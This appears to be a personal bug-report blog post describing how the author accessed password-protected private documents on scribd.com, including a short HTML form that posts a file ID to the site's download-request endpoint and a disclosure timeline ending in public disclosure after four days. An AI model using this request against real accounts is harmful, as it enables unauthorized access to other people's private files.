How i Found Information Disclosure on Scribd.com
hi, this is my first write up on medium.com.
11 days ago i found a vulnerability on scribd.com when i finding an answer of my homework ( I was lazy at that time).
then I made a document and made the document private
In my heart I thought that the download button made me curious, so I decided to intercept before pressing the download button. and I found a Request with the POST method in the url: https://www.scribd.com/document_downloads/request_document_for_download
Then I will make a document and give a password (make private) the document and try to get access from another account. After that I created a new account and made a CSRF whose contents were more or less like this:
<html> <title> Scribd VUlnerability </ title> <body> <form action = “https://www.scribd.com/document_downloads/request_document_for_download" method = “POST”>
<input type = “hidden” name = “id” value = “(ID FILE)” />
<input type = “submit” value = “Submit request” />
</ form>
</ body>
</ html>.
and try to do pentesting.
Bingo! after that I managed to get the password to see the private document. After that I asked whether there was a bug bounty program or not to the IT security scribd. after 11 days (When I wrote this) I immediately reported this bug to the Scribd team so that it could be fixed.
Full Video PoC on my Blog :
https://raflipasya19.blogspot.co.id
My Youtube Channel :
T-GOX Channel
https://raflipasya19.blogspot.co.id
My Youtube Channel :
T-GOX Channel
Status:
- 19 November 2018 16:59 PM = Reported To Scribd Security Team
- 20 November 2018 01:58 AM = Their team Triage my report
- 23 November 2018 09:50 PM = No Respon, I disclose this report xD
0 comments